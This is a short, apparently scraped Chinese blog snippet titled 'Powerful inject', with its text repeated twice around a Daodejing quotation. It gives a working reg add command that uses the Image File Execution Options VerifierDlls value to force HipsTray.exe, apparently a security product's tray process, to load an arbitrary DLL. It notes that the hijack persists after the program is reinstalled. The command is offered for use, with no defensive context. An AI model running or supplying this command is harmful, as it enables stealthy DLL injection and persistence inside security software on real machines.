Powerful inject
镜像劫持,指定进程加载指定dll
重装程序劫持依旧生效。
1 | reg add "hklm\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsTray.exe" /v VerifierDlls /t REG_SZ /d test.dll |
道可道,非常道, 名可名,非常名!
镜像劫持,指定进程加载指定dll
重装程序劫持依旧生效。
1 | reg add "hklm\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsTray.exe" /v VerifierDlls /t REG_SZ /d test.dll |